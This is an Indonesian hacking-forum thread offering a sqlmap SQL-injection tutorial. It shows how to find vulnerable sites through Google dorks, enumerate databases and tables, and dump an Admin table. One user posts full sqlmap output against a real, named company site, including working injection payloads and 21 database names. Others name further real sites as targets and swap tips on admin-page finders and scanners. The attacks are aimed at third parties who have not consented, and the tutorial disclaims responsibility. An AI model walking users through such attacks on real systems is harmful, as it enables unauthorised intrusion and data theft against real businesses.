SQLi Sqlmap.py
apa kedua website ini ada LOGIN PAGE nya :

http://www.moslerauto.com/
marylandendocrine.com

seharusnya ada om...
coba pake admin finder atau dirbuster Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End

ada yg tau arti dibawah ini .
[15:28:06] [INFO] using '/pentest/database/sqlmap/output/site.com/session' as session file

dan gmn ya cara buat masuk ke DBS yg menggunakan session ???
da yg tau tlong bagi2 ilmunya ??

(08-30-2011, 03:48 PM)Veronochi Wrote: ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...

ok langsung aja dari pada lama2..

yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...

hihihiihih Tongue

ok serius nie..

1.buka SQL Map kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...

3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...

4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..

5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://site.com -D gatotganteng -T Admin --columns

Code:
pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump

kalo udah begini silakan dah..

mau kalian apain tapi yang jelas w kgk tanggung jawab ya..


wkwkwkkwkwkkwk

:ngakak:

udah jangan lupa

:kasihcendol:

wkwkkwkwk

salam veronochi

dan w hanya mau berbagi kepada orang-orang yang mau belajar...

nice share bro...


(06-08-2012, 03:36 PM)ria Wrote: root@anugeria:~# cd /pentest/database/sqlmap
root@anugeria:/pentest/database/sqlmap# python sqlmap.py -u www.**************.com/catalog.php?Id=4 --dbs

sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:17:02

[22:17:03] [INFO] using '/pentest/database/sqlmap/output/www.childrensfactory.com/session' as session file
[22:17:03] [INFO] testing connection to the target url
[22:17:06] [INFO] testing if the url is stable, wait a few seconds
[22:17:10] [INFO] url is stable
[22:17:10] [INFO] testing if GET parameter 'Id' is dynamic
[22:17:12] [INFO] confirming that GET parameter 'Id' is dynamic
[22:17:14] [INFO] GET parameter 'Id' is dynamic
[22:17:17] [WARNING] reflective value(s) found and filtering out
[22:17:17] [INFO] heuristic test shows that GET parameter 'Id' might be injectable (possible DBMS: Microsoft SQL Server)
[22:17:17] [INFO] testing sql injection on GET parameter 'Id'
[22:17:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:17:29] [INFO] GET parameter 'Id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[22:17:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:17:56] [INFO] GET parameter 'Id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[22:17:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:18:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:18:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:18:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
GET parameter 'Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=4 AND 3191=3191

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Id=4 AND 8177=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(112)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (8177=8177) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(111)+CHAR(105)+CHAR(58)))
---

[22:20:02] [INFO] testing Microsoft SQL Server
[22:20:05] [INFO] confirming Microsoft SQL Server
[22:20:12] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Apache, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2005
[22:20:12] [INFO] fetching database names
[22:20:15] [INFO] the SQL query used returns 21 entries
[22:20:20] [INFO] retrieved: advancedreporting
[22:20:24] [INFO] retrieved: iERP85_CFCANADA
[22:20:29] [INFO] retrieved: iERP85_CONSOLIDATION
[22:20:41] [INFO] retrieved: iERP85_COSTING
[22:20:45] [INFO] retrieved: iERP85_EXTRA
[22:20:48] [INFO] retrieved: iERP85_GHE
[22:20:51] [INFO] retrieved: iERP85_LIVE
[22:20:53] [INFO] retrieved: iERP85_SANDBOX
[22:20:55] [INFO] retrieved: iERP85_TEST
[22:20:58] [INFO] retrieved: iERP85_WRI
[22:21:01] [INFO] retrieved: iERP85_WRII
[22:21:03] [INFO] retrieved: IT
[22:21:06] [INFO] retrieved: brother
[22:21:09] [INFO] retrieved: model
[22:21:11] [INFO] retrieved: msdb
[22:22:00] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[22:22:23] [INFO] retrieved: ReportServer
[22:22:45] [INFO] retrieved: ReportServerTempDB
[22:23:22] [INFO] retrieved: tempdb
[22:23:43] [INFO] retrieved: uniPoint_Live
[22:24:05] [INFO] retrieved: Unipoint_Training
[22:24:28] [INFO] retrieved: uniPoint_unidx
available databases [21]:
[*] advancedreporting
[*] iERP85_CFCANADA
[*] iERP85_CONSOLIDATION
[*] iERP85_COSTING
[*] iERP85_EXTRA
[*] iERP85_GHE
[*] iERP85_LIVE
[*] iERP85_SANDBOX
[*] iERP85_TEST
[*] iERP85_WRI
[*] iERP85_WRII
[*] IT
[*] brother
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] uniPoint_Live
[*] Unipoint_Training
[*] uniPoint_unidx

[22:24:29] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.childrensfactory.com'

[*] shutting down at 22:24:29



#pilih yang mana nih kk databasenya untuk dcari --tables nya ? soalnya banyak amat .. hahahaha
root@anugeria:/pentest/database/sqlmap# python sqlmap.py -u www.**************.com/catalog.php?Id=4 --current-db
fungsi --current-db adalah untuk mencari database yang sedang digunakan oleh web itu


(06-24-2012, 04:00 PM)beeferr Wrote: ada yg tau arti dibawah ini .
[15:28:06] [INFO] using '/pentest/database/sqlmap/output/site.com/session' as session file

dan gmn ya cara buat masuk ke DBS yg menggunakan session ???
da yg tau tlong bagi2 ilmunya ??
itu gunakan session file yang terbentuk saat kita inject,,kalau om masuk ke folder /pentest/database/sqlmap/output/site.com/ ada dua file yaitu log sama session,

di log itu isinya log kegiatan inejction ita,,
di session itu isinya session injection kita,, bisa dilihat aja isinya



naaaah....
trus cara nyari halaman adminnya gimana ?
kalo pake' admin finder online kadang gg ketemu...
masak web gg ada login adminnya...?
~{eMJe}~

g semua web pake admin page,ada yang pake control panel buat update2nya,ada yang pake ftp,
di backtrack, buat cari nya pake dirbuster,,

Thumbs Up 
Thx infonya om..
sangant bermanfaat... Big Grin
~{eMJe}~

serem HEKER nya beraksi :Smile

mw nanya nih...
slain joomscan, ada gak tool yg lain bwt scan dork joomla ?

maap masih pengguna baru....
root@1ch4l:~#






Users browsing this thread: 1 Guest(s)